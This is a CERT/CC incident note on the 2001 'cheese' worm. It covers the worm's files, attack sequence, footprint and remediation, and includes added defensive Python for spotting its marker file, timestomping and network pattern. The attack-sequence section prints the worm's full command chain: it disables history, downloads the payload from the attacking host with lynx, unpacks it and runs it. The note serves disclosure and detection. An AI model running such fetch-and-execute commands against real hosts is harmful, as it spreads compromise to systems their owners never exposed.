The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.

<h2>The "cheese" Worm</h2>

Date: Thursday, May 17, 2001<p>
<h3>Overview</h3>

The CERT/CC has observed in public and private reports a recent
pattern of activity surrounding probes to TCP port 10008. We have
obtained an artifact called the 'cheese worm' which may contribute to
the pattern.

<h3>Description</h3>
<p>
The 'cheese worm' is a worm designed to remove all inetd services
referencing '/bin/sh' from systems with root shells listening on TCP
port 10008. In reality, the 'cheese worm' will attempt to execute a
series of shell commands on any host which accepts TCP connections on
TCP port 10008.
<p>
The 'cheese worm' perpetuates its attack cycle across multiple hosts
by copying itself from attacking host to victim host and
self-initiating another attack cycle. Thus, no human intervention is
required to perpetuate the cycle once the worm has begun to propagate.
<p>
<b>Contents:</b>
<p>
<font face="Courier New">
<pre>
  MD5 Checksum                     Filesize Filename
  -------------------------------------------------------
  c6a0feb1b1723493fe504148df4fc0af     2381 cheese
  a87a2a8c31cfe38af309e173c2257158       47 go
  0093fdcb12b6fb836495b7cd53d19ddb    15471 psm
</pre>
</font>
<p>
<b>Attack Sequence:</b>
<p>
In examples we have seen, the contents of the 'cheese worm' are
installed in '/tmp/.cheese' and that directory is the working
directory as commands are executed.
<p>
The attack sequence is initiated with the execution of the shell
script 'go' on the attacking host. 'go' simply executes the perl
script 'cheese':
<p>
<font face="Courier New">
<pre>
    /tmp/.cheese/go:
    #!/bin/sh
    nohup ./cheese $1 1&gt;/dev/null 2&gt;&amp;1 &amp;
</pre>
</font>
<p>
The 'cheese' script does the following:
<p>
<ul>
<li>changes its process name to 'httpd'</li>
<li>deletes the 'go' script</li>
<li>checks for a file named 'ADL' in the working directory
<ul>
<li>if found, 'cheese' exits</li>
<li>if not found, the 'ADL' file is created, the string 'ADL' is
      written into the file, and the timestamp is set to match the
      timestamp of the system's '/bin/ls' file</li>
</ul></li>
<li>reads '/etc/inetd.conf' and rewrites it excluding any line
    that contains the string '/bin/sh'</li>
<li>attempts to restart inetd twice, once using '/usr/bin/killall'
    and once using '/bin/killall'</li>
<li>until the 'cheese' process is somehow killed, it repeats a cycle
    of scanning semi-random /16 (i.e., class B) network blocks for
    hosts listening on TCP port 10008 using the 'psm' program
<ul>
<li>the first octet of the address may be from 193 to 218</li>
<li>the second octet of the address may be from 1 to 254</li>
</ul>
<p>On hosts responding to a probe on TCP port 10008, the worm</p>
<ul>
<li>establishes a TCP connection to port 10008 of the victim host</li>
<li>starts a listener process on a random TCP port number from
        10000 through 15000
<ul>
<li>the listener process will send a copy of
          '/tmp/.cheese/cheese.uue' to anything that provides two
          linefeeds after connecting to its TCP socket</li>
</ul></li>
<li>sends the following commands to the victim host on TCP port
        10008 (word wrapped for readability)
<font face="Courier New">
<dl>
<dd>export TERM=vt100 ; </dd>
<dd>export PATH=\"/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\" ; </dd>
<dd>export HISTFILE=/dev/null ; </dd>
<dd>mkdir /tmp/.cheese ; </dd>
<dd>touch -r /bin/sh /tmp/.cheese ; </dd>
<dd>cd /tmp/.cheese ; </dd>
<dd>lynx -source http://$li:$rp/ &gt;cheese.uue ; </dd>
<dd>uudecode cheese.uue ; </dd>
<dd>tar zxvf cheese.tgz ; </dd>
<dd>rm -f cheese.tgz ; </dd>
<dd>touch -r /bin/sh * ; </dd>
<dd>chmod 755 * ; </dd>
<dd>./go $mhih ; </dd>
<dd>exit ;</dd>
</dl>
</font>
<ul>
<li>'$li' contains the IP address of the local system</li>
<li>'$rp' is the TCP port on the local system for the listener</li>
<li>'$mhih' is the IP address of the victim host</li>
</ul>
<p>If successfully executed on the victim host, these commands
        cause a copy of the 'cheese worm' (i.e., cheese.uue) to be
        downloaded, installed, and executed on the victim host.</p>
</li>
<li>terminates the listener process</li>
</ul>
</li>
</ul>
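The 'ADL' marker file and the worm's habit of copying the timestamp of '/bin/sh' or '/bin/ls' onto everything it drops give a host-side pivot for triage. The following Python is an added example, not part of the CERT/CC note or of the worm: it reports files whose modification time exactly equals a reference binary's and checks for the marker file. It runs entirely against a constructed tree under a temporary directory, so the '/bin/sh' and '/tmp/.cheese' inside it are stand-ins, and nothing on the real system is read or modified.

```python
import os
import tempfile
from pathlib import Path

ADL_MARKER = "ADL"  # marker file the worm leaves in its working directory


def timestomped_files(root, reference_paths):
    """Return (file, reference) pairs under root whose mtime, to the second,
    equals a reference binary's mtime. The worm runs 'touch -r /bin/sh' on
    everything it drops, so exact matches against /bin/sh or /bin/ls are a
    useful pivot when triaging a /tmp tree."""
    ref_times = {str(p): int(Path(p).stat().st_mtime) for p in reference_paths}
    hits = []
    for path in Path(root).rglob("*"):
        mtime = int(path.stat().st_mtime)
        hits.extend((str(path), ref) for ref, t in ref_times.items() if t == mtime)
    return sorted(hits)


def has_adl_marker(workdir):
    """True if workdir holds the 'ADL' file containing the string 'ADL'."""
    marker = Path(workdir) / ADL_MARKER
    return marker.is_file() and marker.read_text(errors="replace").strip() == ADL_MARKER


def build_sample():
    """Construct a throwaway tree that mimics the described footprint.
    Returns (root, workdir, fake_sh); the real /bin and /tmp are untouched."""
    root = Path(tempfile.mkdtemp(prefix="cheese-demo-"))
    fake_sh = root / "bin" / "sh"                 # stand-in for /bin/sh
    fake_sh.parent.mkdir()
    fake_sh.write_text("#!/bin/sh\n")
    os.utime(fake_sh, (1_000_000_000, 1_000_000_000))   # constructed mtime
    work = root / "tmp" / ".cheese"               # stand-in for /tmp/.cheese
    work.mkdir(parents=True)
    for name in ("go", "cheese", "psm", ADL_MARKER):
        f = work / name
        f.write_text(ADL_MARKER if name == ADL_MARKER else "# constructed stand-in\n")
        os.utime(f, (1_000_000_000, 1_000_000_000))     # effect of 'touch -r /bin/sh *'
    (root / "tmp" / "unrelated.log").write_text("normal file\n")  # mtime stays 'now'
    return root, work, fake_sh


if __name__ == "__main__":
    root, work, fake_sh = build_sample()
    print("ADL marker present:", has_adl_marker(work))
    for path, ref in timestomped_files(root / "tmp", [fake_sh]):
        print(f"{path} shares its mtime with {ref}")
```

On a real system the same functions would be pointed at /tmp with ['/bin/sh', '/bin/ls'] as references; an exact second-level match on user-writable files is unusual enough to be worth a look.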
<h3>Impact</h3>
<p>
<b>Network Footprint:</b>
<p>
A host running an active instance of the 'cheese worm' will
<p>
<ul>
<li>scan TCP port 10008 on remote /16 network blocks</li>
<li>initiate TCP connections to TCP port 10008 on victim hosts</li>
<li>receive a TCP connection on a TCP port number from 10000 through
    15000 when the worm replicates to a victim host</li>
</ul>
<p>
A victim host being compromised by the 'cheese worm' will
<p>
<ul>
<li>receive a probe to TCP port 10008 from the attacking host</li>
<li>receive a TCP connection to port 10008 from the attacking host</li>
<li>initiate a TCP connection to a TCP port number from 10000 to
    15000 on the attacking host</li>
<li>begin the attack cycle of an active 'cheese worm' host</li>
</ul>
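The two footprint lists above translate into two correlation rules over connection records: a source touching many hosts in one /16 on TCP port 10008, and a host that connects back to that source on a port between 10000 and 15000 shortly after receiving a connection on 10008. The Python below is an added example, not part of the original note; the flow records and addresses are constructed from documentation ranges.

```python
from collections import defaultdict
from ipaddress import ip_network

PROBE_PORT = 10008                      # port the worm probes and connects to
LISTENER_PORTS = range(10000, 15001)    # worm's one-shot listener for cheese.uue

# Constructed connection records (timestamp, src, sport, dst, dport). Addresses
# come from documentation ranges; this is sample data, not captured traffic.
FLOWS = [
    (100, "198.51.100.7", 40001, "203.0.113.1", 10008),
    (101, "198.51.100.7", 40002, "203.0.113.2", 10008),
    (102, "198.51.100.7", 40003, "203.0.113.3", 10008),
    (104, "198.51.100.7", 40005, "203.0.113.5", 10008),
    (110, "198.51.100.7", 40006, "203.0.113.5", 10008),  # attack connection to a responder
    (112, "203.0.113.5", 32768, "198.51.100.7", 12345),  # victim fetches cheese.uue
    (500, "192.0.2.9", 50000, "203.0.113.80", 80),       # ordinary web traffic
]


def scanning_sources(flows, min_targets=4):
    """Map each source that touches >= min_targets distinct hosts on TCP/10008
    inside one /16 to the set of /16 blocks it swept (the worm scans per /16)."""
    seen = defaultdict(lambda: defaultdict(set))
    for _ts, src, _sport, dst, dport in flows:
        if dport == PROBE_PORT:
            seen[src][str(ip_network(f"{dst}/16", strict=False))].add(dst)
    result = {}
    for src, blocks in seen.items():
        swept = {b for b, hosts in blocks.items() if len(hosts) >= min_targets}
        if swept:
            result[src] = swept
    return result


def replication_events(flows, window=60):
    """Return (attacker, victim, probe_ts, callback_ts) tuples: an inbound
    connection to the victim on TCP/10008 followed within `window` seconds by
    the victim connecting back to the attacker on a port in 10000-15000."""
    probes = [(ts, src, dst) for ts, src, _sp, dst, dport in flows if dport == PROBE_PORT]
    events = []
    for ts, src, _sp, dst, dport in flows:
        if dport not in LISTENER_PORTS:
            continue
        matching = [pts for pts, a, v in probes
                    if a == dst and v == src and 0 <= ts - pts <= window]
        if matching:
            events.append((dst, src, max(matching), ts))
    return events
```

Calling scanning_sources(FLOWS) flags 198.51.100.7 as sweeping 203.0.0.0/16, and replication_events(FLOWS) pairs its connection at t=110 with the victim's connect-back at t=112; the unrelated web connection matches neither rule.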
<p>
<b>System Footprint:</b>
<p>
The following files may be found on a system impacted by the 'cheese
worm':
<dl>
<dd>/tmp/.cheese/</dd>
<dd>/tmp/.cheese/ADL</dd>
<dd>/tmp/.cheese/go</dd>
<dd>/tmp/.cheese/cheese</dd>
<dd>/tmp/.cheese/psm</dd>
<dd>/tmp/.cheese/cheese.uue</dd>
<dd>/tmp/.cheese/cheese.tgz</dd>
</dl>
<p>
The following files may be modified:
<p>
<dl>
<dd>/etc/inetd.conf
</dd></dl>
<p>
The following services may be restarted:
<p>
<dl>
<dd>inetd</dd>
</dl>
<p>
The 'cheese worm' relies on an exposed, unauthenticated, privileged
shell listening on TCP port 10008 to alter a system and perpetuate
its attack cycle. As such, the presence of the 'cheese worm' on a
system implies an insecure system configuration or a previous system
compromise. 

<h3>Solutions</h3>
<p>
The CERT/CC encourages sites to review hosts infected with the 'cheese
worm' for other signs of intrusion and take appropriate steps to
ensure the security of impacted systems.
<p>
In particular, certain versions of the BIND TSIG exploit discussed
in 
<p>
<dl>
<dd><a href="/incident_notes/IN-2001-03.html">IN-2001-03</a>,
    Exploitation of BIND Vulnerabilities</dd>
</dl>
<p>
create a backdoor root shell on TCP port 10008. Such an exploit was
bundled into at least one version of the '1i0n' worm. A detailed
analysis of the '1i0n' worm was published by Max Vision and is
available at
<p>
<dl>
<dd><a href="http://www.whitehats.com/library/worms/lion/index.html">
    http://www.whitehats.com/library/worms/lion/index.html</a></dd>
</dl>
<p>
The <a href="http://certcc.or.kr/">Korea Computer Emergency Response
Team Coordination Center (CERTCC-KR)</a> has published
<a href="http://www.certcc.or.kr/paper/incident_note/2001/in2001_007.html">
CERTCC-KR-IN-01-007</a> discussing the 'cheese' worm in Korean.
</p>
<p>
If you believe a host under your control has been compromised, you may
wish to refer to
</p>
<p>
<dl>
<dd><a href="/tech_tips/root_compromise.html">Steps for Recovering From a Root Compromise</a></dd>
</dl>
</p>
<h3>Acknowledgement</h3>
The CERT/CC thanks <a href="http://www.certcc.or.kr/">CERTCC-KR</a> for their contributions to this Incident Note.
<p>
<b>Author</b>: <a href="mailto:cert@cert.org?subject=IN-2001-05%20Feedback">Kevin Houle</a><br/>
</p>
<p>Copyright 2001 Carnegie Mellon University.</p>
</p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p>